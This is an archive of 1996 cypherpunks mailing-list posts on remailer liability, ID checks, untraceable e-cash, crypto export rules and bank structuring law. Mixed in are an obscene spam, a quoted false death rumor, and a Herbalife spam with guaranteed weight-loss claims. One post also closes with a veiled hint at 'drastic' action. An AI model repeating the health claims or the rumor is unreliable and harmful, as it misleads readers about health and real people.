3. Civil libertarians will wail and will cite the 1956 Supreme Court case
about leafletting. Lawyers on the other side will point out that all that
is being affected is _mail_, not anonymous speech in public fora (though
restrictions on that may be tried, too). That is, that the _content_ of a
package, a la the Postal Service I.D. situation, is not at issue, only the
valid identification of point of origin.

4. A couple of court rulings could devastate remailers. For example,
holding remailers liable, criminally and civilly, for the content of
messages they deliver. Without an origin address, the remailer could be
assumed to have originated the message.

(This has long been an issue, implicit in my "everyone a remailer" thesis
of a few years back. Anyone could send any message, and simply claim "I
didn't write it...I'm just a remailer.")

In closing, I think the Supreme Court will, when it eventually agrees to
hear a relevant case, will differentiate between protected anonymous speech
in public forums and the labelling of sealed packages, sealed letters, and
sealed e-mail. They will argue along the lines of saying that the labelling
law is for the protection of society and not for tracking down dissidents.
The effect will of course be the same, but this will be the fig leaf which
allows them to uphold such laws.

--Tim May





Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roland@internetfleamarket.com
Date: Sun, 29 Dec 1996 14:09:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: VIB
Message-ID: <199612292208.OAA03107@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Fuck_God_Up_The_Ass,

This is a VIB (Very Important Bookmark)!

The Internet Fleamarket is available now to all Internet users locally, 
nationwide and worldwide.

Sell what you don't need, offer your service and reach out to 
all.  Or just visit us!

http://internetfleamarket.com .

Happy New Year!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Sun, 29 Dec 1996 14:15:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <Pine.SUN.3.95.961224080613.9113C-100000@netcom12>
Message-ID: <5a6qc8$54r@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199612241223.HAA14556@homeport.org>,
Adam Shostack  <adam@homeport.org> wrote:
> 	(Speaking of which, is a state
> university student ID considered 'government issued?'  How about a
> faculty or staff ID card?)

Well, when I fly they ask for 'government issued' picture ID, and
I present my UC Berkeley student ID for inspection.  They usually
grumble at me, but I grumble back, and in the end they've always
accepted it.  Try it sometime.  (And yes, my student ID is probably
eminently forgable -- it looks very ragged and unprofessional.)

P.S.  At JFK I had a guy tell me that they preferred to see my
social security card!  I was completely surprised, since it has no
picture, and (I think) says 'this card not to be used for identification
purposes' at the bottom.  Anyone know anything about this?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 29 Dec 1996 14:35:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: cypherpunks suggestion
Message-ID: <199612292022.OAA20370@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


John -- 

Just got back after vacation...

It is my understanding that cpunks list has been attacked by 
several clever tricks. I have a couple of suggestions on how to 
improve protection of this list:

# Use the following recipe in .procmailrc for cypherpunks (or majordomo)
# account: 

:0
* ^TOcypherpunks
* !^X-Loop:
* !^FROM_MAILER
* !^FROM_DAEMON
* !^X-Mailing-List:
{
  # get rid of duplicates
  :0 Wh: msgid.lock
  | formail -D 65524 msgid.cache

  # add X-Loop:, etc
  :0 fhw
  | formail -I "X-Loop: cypherpunks@toad.com" 		\
	    -I "X-Mailing-List: cypherpunks@toad.com"	\
	    -I "Precedence: list"			\
	    -I "Errors-To: cypherpunks-errors@toad.com"

  # this recipe finally passes the submission to majordomo
  :0
  | majordomo ....
}

The rest is not really anything for cypherpunks, and should go to /dev/null.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Dec 1996 13:00:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: With my deepest regards....
In-Reply-To: <19961228093152972.AAA292@monalisa>
Message-ID: <oqqPZD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


admin@veracruz.net (Adam Breaux) writes:

> I am withdrawing from this list.

Good riddance, and an unhappy new year to all "cypher punks".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 29 Dec 1996 11:56:25 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: John Gilmore, 58, dead of AIDS
In-Reply-To: <Pine.LNX.3.95.961229115954.9171C-100000@dhp.com>
Message-ID: <199612291956.OAA26388@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



aga writes:
> On Sun, 29 Dec 1996, Anonymous wrote:
> 
> > John Gilmore died of AIDS today in his San Francisco bathhouse, Toad Hall.
> > He was 58.
> > 
> 
> Is this true, or just some bullshit?

Its bullshit from the usual sources.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 15:04:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "Structuring" of Communications a Felony?
In-Reply-To: <v02140b03aeec93ad25a9@[10.0.2.15]>
Message-ID: <v03007800aeeca89ec7b5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Another point about "anonymous speech" and its legal protections (a la the
1956 Georgia leafletting case), consider a similar "basic right": the right
to move freely and anonymously.

Well, it turns out that in the U.S. this right is thwarted by income tax
laws. Not to mention driver's license laws, Social Security laws, etc.

(Yes, as Duncan and others are fond of pointing out, there are ways to
avoid some of these laws. I won't recap them here. But these are often
difficult to bypass, at least for those not constantly watching every
action they take, and may be felonies in some cases. Loompanics and Paladin
sell various books on creating new identities, etc.)

For example, while citizen-units in the United States are free to move to
new locales without permission and without registration, unlike in some
countries, the tax collector expects a valid home (or at least mailing)
address on tax returns. (Use of a tax preparer is one workaround, though
the tax preparer probably is required by some law or another to know the
"true domicile" of a client...left as an exercise as to whether this is
ever enforced.)

My point is not to attack the notion of taxation, but to note that tax
collection often involves by necessity (for our current approach) strong
invasions of privacy...no different from when the King's Tax Collector
roamed around one's farm and household looking for things to tax. Harry
Browne makes this point eloquently in his new book, "Why Government Doesn't
Work."

I believe the various rumblings about regulation of digital cash and
electronic mail will turn out to be enacted with this kind of justification.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starr@lakes.ring.com
Date: Sun, 29 Dec 1996 15:19:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Do you need the MOST powerful way to advertise?
Message-ID: <199612292319.PAA04561@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


cypherpunks@toad.com,

Hi, saw you posting online and was wondering if you
market products/services using your computer and would
like to learn how to do so QUITE a bit better than what
you are already doing?<g>

If so, just say the words (words=MORE ORDERS) and I'll
email a free, helpful file that could mean the online
marketing difference between scintillating success and
frustrating failure. 

OR! to get this profitable information free RIGHT NOW!
INSTANTLY! send an email to 

star-conniestarr-netcontact@nicers.com 

(just put this in the to: field)

and a free, complete information package will be emailed
to you automatically in less than ONE MINUTE! ACT NOW!

Sincerely, 

Connie Starr


ps:  don't forget the address to send for free information has 
     one r in the first star and two r's in the second starr <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 15:13:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Internal Passports
In-Reply-To: <Pine.SUN.3.95.961224080613.9113C-100000@netcom12>
Message-ID: <v03007801aeecab7271cd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:12 PM -0800 12/29/96, David Wagner wrote:
>In article <199612241223.HAA14556@homeport.org>,
>Adam Shostack  <adam@homeport.org> wrote:
>> 	(Speaking of which, is a state
>> university student ID considered 'government issued?'  How about a
>> faculty or staff ID card?)
>
>Well, when I fly they ask for 'government issued' picture ID, and
>I present my UC Berkeley student ID for inspection.  They usually
>grumble at me, but I grumble back, and in the end they've always
>accepted it.  Try it sometime.  (And yes, my student ID is probably
>eminently forgable -- it looks very ragged and unprofessional.)
>
>P.S.  At JFK I had a guy tell me that they preferred to see my
>social security card!  I was completely surprised, since it has no
>picture, and (I think) says 'this card not to be used for identification
>purposes' at the bottom.  Anyone know anything about this?

My SS card, issued in 1969 (and which I still have, surprisingly enough),
says this. Someone said recently here on the list that this line was
dropped in more recent years.

I've never once, in 29 years, been asked to show my little ragged card, and
I only have it because I kept it stored with my passport. (No employer ever
asked to see it; I haven't been employed for more than 10 years, so I can't
say anything about recent policies in the wake of the "immigration crisis.")

The current hysteria about "identification" probably does nothing to stop
real terrorists...if there's one thing they can easily afford, it's
realistic-looking ID cards, in any flavor and in any number.

What I think this means is a move toward a national ID card, replacing the
confusing (to airlines, to government agents, etc.) mishmash of state
driver's licenses, student ID cards, etc. After all, if someone doesn't
drive, and has no passport, just what _is_ there "government issued"
picture ID supposed to be, if not a national ID card? Or, as we like to
say, an "internal passport."

Or as the Christian Right likes to say, "the mark of the Beast." Big
Brother's SS number: 666-42-0000.

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jguarnie@ix7.ix.netcom.com
Date: Tue, 31 Dec 1996 09:33:46 -0800 (PST)
To: jguarnie@ix.netcom.com
Subject: Thermojetic Herbal BreakThrough!!!
Message-ID: <199612292025.MAA28652@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


******SORRY FOR THE INTRUSION THIS IS A ONE TIME MESSAGE*****
       ********YOU WILL NOT BE CONTACTED AGAIN********

!!!!!!!!!! THERMOJETICS HERBAL BREAKTHROUGH !!!!!!!!!!

** FINALLY AN ALL NATURAL DIET/NUTRITIONAL PROGRAM **
               **100% GUARANTEED TO WORK **                     

A Major breakthrough was the discovery and the use of some very
special herbs. "THERMOJETICS" Contains twenty-one different herbs
from around the world including important chinese herbs and herbs
from the Amazon Rain Forest. Each herb is specially chosen to 
work in harmony with the others to creat a powerful yet perfectly 
balanced product. 

Herbs are nature's nutritional bounty. They are rich sources of
vitamins minerals,fiber, and related nutrients essential for good
health...

Yes Lose Up To 30 lbs In 30 days, 100% guarantee programs start
at $29.95 plus Shipping & Handling {30 DAY SUPPLY APROX.}
LOSE 2 to 6 POUNDS A WEEK!!!!

The Herbalife program does not use Drugs, Medications, Hormones
or other Synthetic agents to promote weight loss.{Non Addicting}
INCREASE YOUR METABOLISM WHILE DECREASING YOUR APPETITE!!!

Our program is nutritionally complete so individuals can loss 
weight safely and effectively, and just as important keep the
weight off..../ "Liquid Protein" diets, which use nutritionally
unbalanced protein-based drinks, or starvation diets, which
reduce calories so low [less than 500 Calories daily] that
people literally starve to lose weight,are both extremely 
unhealthy and have less than 20% long-term success.

Save Money & Time While Dieting
Why join other weight loss clubs,or expensive diet programs where
they charge you each time you vist or a monthly fee "plus" the
cost of their products,or use an inadequate store bought drink or
other diet plan....OUR PROGRAM WORKS !!! 100% GUARANTEED. you have
nothing to lose except those extra pounds....and you don't have to
interrupt your busy lifestyle, no office or club meetings to 
attend no need to go to the store for more diet products {we ship 
directly to you, usually within 48hrs..} Programs are aproximately
a thirty day supply of product.Usually the money you save on your
grocery bill while dieting more than pays for the programs....

Over 16 Years Of Healthy, Fit & Content Customers...

Dr.Recommended...Absolutely. Herbalife has a Medical and Sientific
Advisory Board that tests and researches Herbalifes products and
continually monitors reports of results sent by customers and 
distributors. In addition, many physicians and other health
professionals in all parts of the world use Herbalife both in 
their personal lives and in their practices.

WHAT IS HERBALIFE??? Herbalife is a scientifically formulated,
herbal-based,calorie-reduced nutrition program. The Herbalife 
program has been used for weight control and health enhancement 
since 1980, by not hundreds but "literlly MILLIONS" of individuals
around the world.


WHO SENT YOU THIS MESSAGE:?
We Are Janice And Anthony Guarnieri { NATURALLY YOU } and are 
Independent Distributors of the Herbalife Company Whose Products
are only available soley through their independent distributors 
such as Ourselfs. We are actual Real Life People who have followed
this program and proven it does work....WANT MORE INFORMATION 
ABOUT US,HERBALIFE,& THESE NUTRITIONAL/DIET PROGRAMS Check 
"NATURALLY YOU" Out On The Web:  http://guarnieri.com/naturaly.htm
There you can find out way more information then we can tell you 
in this letter, & Link to the "Herbalife Home Page" to find out 
more about Herbalife.and meet us personaly at our own Page if 
you like.

 
        *** NATURALLY YOU WEIGHT LOSS PROGRAMS ***


#1 START NOW PROGRAM $29.95 plus S & H
Comes with both the Green & Beige Thermojetics tablets.
{21 natural herbs,three natural anti virals [natures infection
fighters],contains "valerian root" a natural calmer. All natural
tablets you take,twice daily usually at 10 am and 3 pm 
{three green & 1 beige tablets}they nourish your body's metabolism
while supressing your appetite..gives a full feeling before 
finishing the meal helps produce a more desirable energy balance
in the body so excess fat mat be reduced.}

#2 FAST PROGRAM $49.90 plus S & H
Comes with the Green & Beige Thermojetics tablets, and also 
Cell Activator capsules"THERMO BOOSTER" taken with the green & 
beige speeds up the process of Thermos by increasing the 
absorption rate. Cell Activator "reactivates"the process, making
your nutrients much better utilized by your body.Helps your body
absorb more from the foods you take in so you need less intake
of foods to satisfy your body's nutritional needs....Add this to
your program & watch how your results TAKE OFF!{usually take 
two cell activator capsules with the green & beige tablets}

#3 FASTER PROGRAM $69.85 plus S & H
Comes with the Green,& Beige Thermojetics tablets,The Cell 
Activator capsules & the Yellow Thermojetics tablets....
Keep the "THERMO" effect going for 24 hours! Made to take at
night and before you goto bed. Lose weight while you sleep! 
Non-stimulating effect. From Citrin [Garcinia] and Chromium 
AN ESSENTIAL MINERAL THAT HELPS REGULATES BLOOD SUGAR. Some 
Herbologists claim it retards the ability of the hormon that
allows us to store fat...{usually take 1 tablet in the evening,
& 1 tablet before going to bed}

#4 FASTEST PROGRAM $89.85 plus S & H
Comes with the Green,Beige,& Yellow Thermojetics tablets,The Cell
Activator capsules...& The FORMULA 1-MEAL REPLACEMENT SHAKE 
"New and Improved!"Tastes incredible! Our original weight-loss 
program, reformulated to contain Aminogen. Uses the same patented
enzyme system. derived from plants to help breakdown and better
assimilate protein, Very high in nutrients. Provides up to 1,500
calories worth of vitamins, minerals, proteins and carbohydrates,
but does so in just 80 calories with less than one gram of fat! 
Also high in fiber and contains all essential aminio acids. 
HAS NO REFINED SUGAR. Available in Dutch Chocolate, Wild Berry,
French Vanilla, and Tropical Fruit.
-----------------------------------------------------------------
What you are actually doing with these programs is not only losing
weight,but replacing your everyday processed,artificial,imitated, 
presevetived,foods available today, with all natural Herbal foods,
proteins,vitamins,minerals,carbohydrates,& nutrients, Herbalife
products are not intended to be a cure for disease,but when the 
body receives ALL nutrition in the CORRECT BALANCE at the celluar
level,it is absolutely amazing what happens to all bodily 
functions!
                            Naturally you
                           29850 Lorraine
                       Warren, Michigan. 48093
                            810-751-2226
                           810-751-2226 fax
---------------------------------------------------------------
    We Are Independent Distributor For The Herbalife Company
----------------------------------------------------------------
***Please Print This Form Out Before Entering Your Information***

Naturally You Ordering Form:>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Please Enter The Following Information:
                 _____________________________
 E-Mail Address /_____________________________/

...So we can get back in touch with you.

 NAME:____________________________________________________________

 ADDRESS__________________________________________________________

 SPACE,APT# ADDRESS_______________________________________________

 CITY, STATE,PROV. COUNTRY________________________________________

 ZIP CODE:________________________

-------------------------------------------------------------------
PLEASE PUT A " X " IN THE BOX NEXT TO THE DIET PROGRAM YOU WISH TO 
ORDER:      { all programs are a 30 day aprox. supply of product }

 START NOW PROGRAM $35.95___ QUANTITY___

 FAST PROGRAM $55.90___ QUANTITY___

 FASTER PROGRAM $75.85___ QUANTITY___

 FASTEST PROGRAM $95.85___ QUANTITY___
 [Formula 1-shake Flavor:]  Dutch Chocolate____,French Vanilla____,
 [Choose one flavor]per program. Wild Berry____,Tropical Fruit____.
{ All Prices Include The Shipping & handling Fee }
-----------------------------------------------------------------
*ALL PROGRAMS COME WITH:"The herbalife Good health Through 
Intelligent Nutrition Catalog"{contains information about all 
herbalifes products and how and why they help you}.
*A Thermojetics Energy Guide
*Recipes For The Meal Replacement Shakes
*"Themo Tips"Instructions For Getting The Maximum Benefits Out Of
These Programs.
*Assorted Testimonials About Herbalife Products
*A FREE GIFT!!
***100% MONEY BACK GUARANTEE!!!***
*Personal instructions about your individual program you have chosen.
!!ATTENTION ORDER SOON SO YOU CAN RECEIVE AND FILL OUT THE HERBALIFE
FREE HAWAII VACATION ENTRY FORM:{must be mailed back to us at
Naturally You by January 7th to make the january 15th drawing date.}
------------------------------------------------------------------
PAYMENT METHOD:Please Indicate Which Method Of Payment You Wish To
Use:{all orders shipped ground parcel post}
[with the exception of out of U.S.A.orders:}
place a " x " in the  apropriat box. 

 C.O.D. SHIPPED DIRECTLY TO YOU___ {we pay the c.o.d.charge
                                     you only pay the S&H fee}

 CHECK, OR MONEY ORDER U.S. FUNDS ONLY___

 CHARGE CARD: VISA, MASTER CARD OR NOVUS/DISCOVER___

{Sorry we are "only" able to take charge orders live over the 
phone, for security reasons we only take charge card orders 
"live": Please E-Mail your Request & You Will Be Given A Phone #
To Call Collect [no charge to you] To Charge Your Order}
**INDIVIDUAL PRODUCTS ARE AVAILABLE ON REQUEST**
Please send individual request to naturaly@guarnieri.com,
or to our address below with method of payment..Thank You

----------------------------------------------------------------
Please Print Then Fill Out This Form & Send It To The Address 
Below With Your Order & Method Of Payment:

           TO: ORDERING DEPT. C/0
               NATURALLY YOU
               29850 LORRAINE BLVD
               WARREN, MI. 48093 

                  Thank You And Happy Holidays,
                  From all Of Us At Naturally You
 
P.S It was brought to our attention that some customers wanted
to Mix & Match their orders No Problem use our Reorder Form off
the Web Page At {http://guarnieri.com/reorder.htm}or E-mail Your
personal requsts...."We Aim To Please"  Thank You....
{EXAMPLE: You Want The #1 program & The Meal Replacement Shake}
---------------------------------------------------------------
E-Mail us at: naturallyyou@guarnieri.com
To Return To Naturally You's Home Page
http://guarnieri.com/naturaly.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 15:31:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <v03007801aee25b84a198@[207.167.93.63]>
Message-ID: <v03007802aeecadd300ea@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



By the way, I was gone last week, and missed some of the follow-ups to this
thread. I did notice in Omegaman's replies that he was replying to
Detwweiler's wailings about "Timmy." (What's with Detweiler and Vulis both
being so hung up on such a nickname? If it makes them feel they're winning
converts, let them call me "Timmy." Jeesh.)

At 6:21 PM -0600 12/29/96, Omegaman wrote:

>But criminals are often a stupid and foolish lot.  Many will be caught at
>the "nexus" of physical action due to their own ineptitude.  I can envision
>several such instances occurring where it is publicized that these were
>contract (killings,extortions,kidnappings) in which the individual was to be
>paid in Bank of Albani digital cash.

Sure, but my interest is in the possible, not the dumb mistakes of dumb
people. That some criminals will screw up and reveal their identities is no
different from the similar possibility that some people will mess up in
using remailers; doesn't alter the interesting properties of remailer
networks.

>This publicity and subsequent public outrage result in many corporations and
>institutions seizing the moral high ground (and a little good publicity
>which could result in more revenue, of course)  and advocating/enforcing a
>ban on usage of bank of Albania digital bux.

Perhaps. But I note that various "outrages" associated with use of Swiss
banks--Jewish gold deposits, banana republic deposits, tax avoidance,
etc.--have not exactly driven Swiss and similar banks out of existence.
Greed is a powerful lubricant. And there are of course various ways to make
the traffic less obvious.

>> Ed takes the crypto credits and redeems them as he sees fit (after some
>> unblinding stuff, of course). The redemption order is unlinkable to the
>> extortion.
>
>True, but if Bank of Albania digital cash is not accepted as a method of
>payment, what good does this do Ed?  No one will change them because they
>are largely worthless.

Ed can of course redeem his Bank of Albania digibux at the Bank of Albania,
if worst came to worst and somehow the Bank of Albania was "frozen out" of
the banking community (see below for why this is effectively impossible).
Go to Tiraz, present the digibux numbers, take payment in paper dollars,
gold coins, whatever.

And, more importantly, the "doubly untraceable" nature of true Chaumian
e-cash means that the Bank of Albania _cannot_ be frozen out of the banking
system (assuming other banks are also issuing Chaumian cash). Any mechanism
that would allow the Bank of Botswana, for example, to "know" that the Bank
of Albania was buying untraceable Botswanabux would of course mean the
Botswanabux were not untraceable! Once Bank of Albania can buy such
untraceable currency, they can pay Ed off in them. Or variants of this.
(The similarity of a network of Chaumian digicash banks to a network of
remailers is obvious...indeed, Chaum's work on "digital mixes" preceeded
his work on digital cash, 1981 vs. 1985.)



...
>Of course not.  But unless untraceable digital cash becomes a ubiquitous and
>widely used form, it will not be useful for these "bad things" (or any other
>purpose
>
>As always, the key is deployment of an untraceable, anonymouse form of
>digital cash now.  Wide usage is part of the key to legitimization.  Right
>now the government is frantically attempting to marginalize the idea of
>fully untraceable digicash with all sorts of four-horsemen publicity.
>
>If everybody's already using it, they'll be far less likely to switch to a
>new digicash-escrow alternative.

Well, I agree with all of these points. They want deployment halted, or at
least slowed.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sun, 29 Dec 1996 16:03:27 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: New crypto regs outlaw financing non-US development
Message-ID: <v02140b04aeec957d92db@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


> Lucky Green writes:
[snip]
>Finally, to the big one:
>>Sec. 736.2  General prohibitions and determination of applicability.
>>
>>* * * * *
>>    (7) General Prohibition Seven--Support of Certain Activities by
>>U.S. persons--(i) Support of Proliferation Activities (U.S. Person
>>Proliferation Activity). If you are a U.S. Person as that term is
>>defined in Sec. 744.6(c) of the EAR, you may not engage in any
>>activities prohibited by Sec. 744.6 (a) or (b) of the EAR which
>>prohibits the performance, without a license from BXA, of certain
>>financing, contracting, service, support, transportation, freight
>>forwarding, or employment that you know will assist in certain
>>proliferation activities described further in part 744 of the EAR.
>>There are no License Exceptions to this General Prohibition Seven in
>>part 740 of the EAR unless specifically authorized in that part.
>
>IMHO, this closes the door on the foreign contracting loophole used by C2
>and others. It is now illegal for US persons to finance or contract out
>overseas crypto development, since doing so will obviously assist in
>proliferation. While not unexpected (I offered a bet on Cypherpunks that
>this would happen. Nobody took the bet.), this provision sets a dangerous
>precedence. The technical assistance prohibitions of the past have been
>transformed into general prohibitions against "financing, contracting,
>service, support, transportation, freight forwarding, or employment".
>
>Again, IANAL.
>

If they have not already done so, those currently doing work for/with C2
can form an off-shore company to manage and develop the crypto work.  This
off-shore company can then sell shares (private/public) to citizens and
companies (both foreign and domestic) and use the proceeds to develop the
software.  Some of the investors (e.g., C2) could be offered the
opportunity to become distributors and support the products in their
respective countries.

I doubt the Executive order can be interpreted to mean U.S. citizens cannot
purchase stocks of foreign companies engaged in crypto.  There are many
companies (e.g., NEC, Siemans, Philips, ect.) which engage in development
of crypto equipment which would not be exportable if they were produced in
the U.S.  Can the gov't deny us the right to invest in these and other
offshore companies?

Since those working for C2 are already doing so offshore (e.g., Australia
and England, I believe) these parties would only need to separately
incorporate an entity to conduct that portion of their current business now
under contract to C2.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Sun, 29 Dec 1996 13:20:02 -0800 (PST)
To: "'Cypherpunks'" <cypherpunks@toad.com>
Subject: Random ITAR violations
Message-ID: <01BBF5A4.147DA1C0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


I was looking through the current rfc index for
something else a few minutes ago when I noticed
rfc2040 from the end of October.  Machine 
readable C code for several modes of RC5.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Sun, 29 Dec 1996 16:28:39 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Internal Passports
In-Reply-To: <v03007801aeecab7271cd@[207.167.93.63]>
Message-ID: <199612300048.QAA28467@gabber.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


> I've never once, in 29 years, been asked to show my little ragged card, and
> I only have it because I kept it stored with my passport. (No employer ever
> asked to see it; I haven't been employed for more than 10 years, so I can't
> say anything about recent policies in the wake of the "immigration crisis.")

	These days you can show a passport in leui of a social
security card. (I showed my"current employer" my SS card because I
kept forgetting to bring my poassport in to work. What an odd concept,
proving to my employer that I had a right to wrk in the
US... apparently the law is that you have a $10k fine if you *dont
have the paperwork* -- it doen't matter if all your employees are
legal.)

> 
> The current hysteria about "identification" probably does nothing to stop
> real terrorists...if there's one thing they can easily afford, it's
> realistic-looking ID cards, in any flavor and in any number.
> 
> What I think this means is a move toward a national ID card, replacing the
> confusing (to airlines, to government agents, etc.) mishmash of state
> driver's licenses, student ID cards, etc. After all, if someone doesn't
> drive, and has no passport, just what _is_ there "government issued"
> picture ID supposed to be, if not a national ID card? Or, as we like to
> say, an "internal passport."
> 
> Or as the Christian Right likes to say, "the mark of the Beast." Big
> Brother's SS number: 666-42-0000.
> 
> --Tim May
> 
> 
> 
> Just say "No" to "Big Brother Inside"
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1398269     | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 


-- 
Sameer Parekh					Voice:   510-986-8770
President					FAX:     510-986-8777
C2Net 		    C2Net is having a party: http://www.c2.net/party/
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Dec 1996 16:57:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <v03007801aeecab7271cd@[207.167.93.63]>
Message-ID: <v03007800aeecc1d485c7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:48 PM -0800 12/29/96, sameer wrote:
>> I've never once, in 29 years, been asked to show my little ragged card, and
>> I only have it because I kept it stored with my passport. (No employer ever
>> asked to see it; I haven't been employed for more than 10 years, so I can't
>> say anything about recent policies in the wake of the "immigration crisis.")
>
>	These days you can show a passport in leui of a social
>security card. (I showed my"current employer" my SS card because I
>kept forgetting to bring my poassport in to work. What an odd concept,
>proving to my employer that I had a right to wrk in the
>US... apparently the law is that you have a $10k fine if you *dont
>have the paperwork* -- it doen't matter if all your employees are
>legal.)

Indeed, the similarities with the "structuring" example (of financial
deposits, even one's own money!!!) are frightening. If prosecutors wanted
to "make an example" of someone, they could.

(This is part of a much larger issue: the vast array of laws, which nearly
all of us violate in various ways on various days. When there are so many
laws that one is almost inevitably a felon is, to me, the very definition
of a "terror state.")

Brian Davis, our former federal prosecutor, seems a reasonable enough
fellow, and I'm fairly certain that he would not have sought an indictment
for a "small fry" who failed to ask for the proper SS card, but it's
sobering to think that a business could be shut down or massively fined for
such a thing. (I was advised in a local newsgroup that asking
Hispanic-looking job applicants more questions about their U.S. status than
one asks of Aryan-looking job applicants is ipso facto a serious, serious
crime. So, what does the white applicant who has no "proof" of his U.S.
residency--no passport, no birth certificate, no official card, just his
"whiteness" and his flawless English--do when confronted with such a
question? Just supplying an SS number is apparently not enough.

By the way, a question for Brian (if he happens to see this): Suppose I
take $27,000 I've had stuffed under my mattress...already taxed, blah blah
blah. In other words, no chance of it being "illicit" or "unreported." That
is, a situation like our gambler friend (he reported the income), except
even more clearly a case where the money is outright owned (by traditional
Western notions of ownership, i.e., cash sitting in a safe deposit box, or
under a mattress, etc.

So, I go to three banks and deposit $9,000 in each, for whatever reasons.

Do I face forfeiture of my money?

If so, I'll joing Jim Bell in his advocacy of solving this problem in a
more drastic way.

(Question: How many "small fry" have faced this kind of forfeiture for
committing the "crime" of making two or more deposits, thus appearing to
fit the "structuring profile"?)

